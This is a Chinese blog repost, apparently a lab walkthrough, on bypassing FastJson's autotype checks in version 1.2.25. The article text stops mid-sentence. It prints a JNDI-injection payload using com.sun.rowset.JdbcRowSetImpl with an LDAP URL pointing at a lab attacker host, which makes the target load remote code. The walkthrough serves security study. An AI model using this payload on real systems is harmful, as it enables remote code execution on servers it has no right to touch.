热门标签
热门文章
- 1zookeeper之安全认证和实际应用_zk认证
- 2基于 VScode 的 macOS 下调试 STM32 的解决方案(完美替代keil)_mdk-arm mac
- 3ROS2快速入门Python篇-版本梳理、环境搭建、源码架构介绍_ros2 python
- 4Spring Cloud中使用 Eureka或Nacos 实现高可用、可扩展的服务注册和发现_springcloud eureka和nacos集成
- 5SpringBoot实现Socket客户端,Netty服务端实现Java通讯(附源码及注释详解)_java netty服务端与客户端相互通讯
- 6大数据平台建设方案_高校大数据平台建设方案(ppt)
- 7selenium的使用深入解析(JAVA实现)_java selenium
- 8区块链Blockchain
- 9对于软件测试的认识和了解_说说你对软件测试领域的了解程度
- 10GraphRAG:整合知识图谱的检索增强生成_graphrag 搜索生
当前位置: article > 正文
FastJson之autotype bypass_fastjson2加白名单
作者:你好赵伟 | 2024-08-09 15:08:47
赞
踩
fastjson2加白名单
FastJson之autotype bypass
在1.2.25版本之后,添加了checkAutoType方法。在方法中引入了白名单(AutoType)、黑名单(denyList)和autoTypeSupport选项
checkAutoType方法
把ubuntu靶机的fastjson版本换到1.2.25,使用原始的payload进行debug
{
"xxx":{
"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://192.168.202.1:6666/Evail", "autoCommit":true}}
- 1
- 2
- 3
在DefaultJSONParser#parseObject中被添加的checkAutoType()方法
对比下图1.2.24版本的DefaultJSONParser#parseObject方法
autoTypeSupport
**autoTypeSupport值:**autoTypeSupport值在1.2.25版本开始的默认是为false(fastjson>=1.2.25默认为false)
**开启方式:**在代码中加入ParserConfig.getGlobalInstance().setA
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/你好赵伟/article/detail/953881
推荐阅读
相关标签
